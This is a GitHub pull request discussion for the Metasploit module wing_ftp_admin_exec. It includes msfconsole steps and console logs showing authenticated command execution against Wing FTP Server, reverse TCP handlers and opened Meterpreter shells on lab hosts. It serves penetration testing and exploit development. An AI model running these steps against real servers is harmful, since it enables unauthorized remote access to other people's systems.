Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Improvements and documentation for wing_ftp_admin_exec #11077

Merged
merged 9 commits into from Mar 5, 2019

Conversation

Projects
None yet
7 participants
@ide0x90
Copy link
Contributor

ide0x90 commented Dec 6, 2018

Notes

Improved the check method and added documentation. Also added a separate PowerShell target (see issue #10980) for in-memory execution.

If authentication is required for the exploit, we might as well go all the way, and do both the check and exploit using one authentication. Specific details about the installed Wing FTP Server version can only be obtained after authentication, so this makes it clear about what version of the vulnerable app we are exploiting.

As of 12/10/2018, The module has been further improved to get hard evidence about the existence of the vulnerability.

Vulnerable application

All versions of Wing FTP Server from 3.0.0 and up are vulnerable.

Upgraded module has been tested on a Windows Server 2016 Datacenter x64 with the following versions:

  • Wing FTP Server 4.3.8
  • Wing FTP Server 6.0.2

Original module has been tested on Windows 7 SP1 and Windows 8.1 with the following versions:

  • Wing FTP Server 4.3.6
  • Wing FTP Server 4.3.8

Verification Steps

  • Start msfconsole
  • use exploit/windows/ftp/wing_ftp_admin_exec
  • set RHOST <target-ip>
  • set USERNAME <valid-username>
  • set PASSWORD <valid-password>
  • exploit
  • Verify that you get a shell
msf5 > use exploit/windows/ftp/wing_ftp_admin_exec 
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
RHOST => 192.168.136.151
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
USERNAME => admin
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD password
PASSWORD => password
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > exploit

[*] Started reverse TCP handler on 192.168.136.146:4444 
[*] Authenticating...
[+] Authentication successful, got session cookie 14bcf0bbb389113e879e5dcaa561f65f
[*] Found Wing FTP Server 6.0.2
[*] Executing payload via PowerShell...
[*] Powershell command length: 5995
[*] Sending stage (179779 bytes) to 192.168.136.151
[*] Meterpreter session 1 opened (192.168.136.146:4444 -> 192.168.136.151:4895) at 2018-12-10 20:54:51 +0800

meterpreter > sysinfo
Computer        : 2K16DTCTR
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 

TODO

  • Implement version check using Gem::Version
  • Find some way to make CmdStager work with version 6.0.2

ide0x90 added some commits Dec 7, 2018

Added links to functionality and cleaned up `check`
to make it much cleaner per @bcoles's recommendations.
Improved version check, made requests more organic,
and improved made PowerShell work on version 6.0.2.
@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Dec 8, 2018

Jenkins test this please

ide0x90 added some commits Dec 9, 2018

Removed offending code, added warning for users,
and updated documentation.

@bcoles bcoles added the delayed label Dec 10, 2018

@ide0x90 ide0x90 closed this Dec 10, 2018

@ide0x90 ide0x90 reopened this Dec 10, 2018

@jrobles-r7 jrobles-r7 self-assigned this Dec 12, 2018

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Feb 9, 2019

I have tested this module on:

  • Wing FTP Server 6.0.3 on Windows 10
  • Wing FTP Server 6.0.1 on Windows 10

In either powershell or command stager mode, the exploit doesn't seem to work. It does say the target is vulnerable though. Here's an example:

msf5 exploit(windows/ftp/wing_ftp_admin_exec) > check

[+] Authentication successful, got session cookie ca25df87f18f6497386425f0e0d80b03
[*] Found Wing FTP Server 6.0.1
[+] 172.16.249.129:5466 The target is vulnerable.
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] Authenticating...
[+] Authentication successful, got session cookie 6e77a346c47d7d17a7bbed1cbe60cf74
[*] Found Wing FTP Server 6.0.1
[*] Executing payload via PowerShell...
[*] Powershell command length: 5983
[-] Exploit aborted due to failure: unknown: 172.16.249.129:5466 - Something went wrong.
[*] Exploit completed, but no session was created.

By the way, I notice that the powershell path check is quite strict like this:

winenv_path.body.include?('C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\')

However, my Windows 10 box's Windows directory name is actually WINDOWS. So I suggest you change the statement to a regex:

winenv_path.body.match(/C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\/i)

Please let me know what info you need so you can reproduce the problem. If possible, maybe provide a vulnerable application for testing just to be sure? Thank you!

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Feb 9, 2019

Is checking for 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\' the best way to determine whether PowerShell is present?

@ide0x90

This comment has been minimized.

Copy link
Contributor Author

ide0x90 commented Feb 10, 2019

@wchen-r7 , I have attempted to make the PowerShell check less stringent based on your suggestions in commit 6d07979. I'm not sure that this is the cause of the failure, but before the latest commit I had remove_comspec set to true on the PowerShell command. Could that (setting remove_comspec to true) possibly be causing problems on your end? As for the vulnerable applications, I have installers for versions 4.3.8, 5.1.3, 6.0.1, 6.0.2 and 6.0.3. To where should I send these installers?

@bcoles , probably not. Fixed in commit 6d07979.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Feb 11, 2019

Hey @Psi0NYX Thank you! I'll share a link with you on Google Drive you can upload your vuln apps there.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Feb 11, 2019

@Psi0NYX I've shared a link with you to imrandawoodjee.infosec@gmail.com.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Feb 11, 2019

EDB has (most likely) 4.3.8 installer: https://www.exploit-db.com/exploits/34517

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Mar 5, 2019

Ok, works for me. Thank you for your patience and the apps @Psi0NYX. I'll land it now.

msf5 exploit(windows/ftp/wing_ftp_admin_exec) > check

[*] Found Wing FTP Server 4.3.8
[+] Found Powershell at C:\Windows\System32\WindowsPowerShell\v1.0\
[+] 172.16.249.130:5466 The target is vulnerable.
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] Found Wing FTP Server 4.3.8
[+] Found Powershell at C:\Windows\System32\WindowsPowerShell\v1.0\
[*] Executing payload via PowerShell...
[*] Sending stage (180291 bytes) to 172.16.249.130
[*] Meterpreter session 2 opened (172.16.249.1:4444 -> 172.16.249.130:49163) at 2019-03-05 12:40:49 -0600

meterpreter > 
@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Mar 5, 2019

@h00die Nice find. Thank you.

@wchen-r7 wchen-r7 merged commit 6d07979 into rapid7:master Mar 5, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wchen-r7 added a commit that referenced this pull request Mar 5, 2019

msjenkins-r7 added a commit that referenced this pull request Mar 5, 2019

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Mar 5, 2019

Release Notes

This adds new module documentation for the wing_ftp_admin_exec exploit module, as well as an improved check and support for Powershell.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.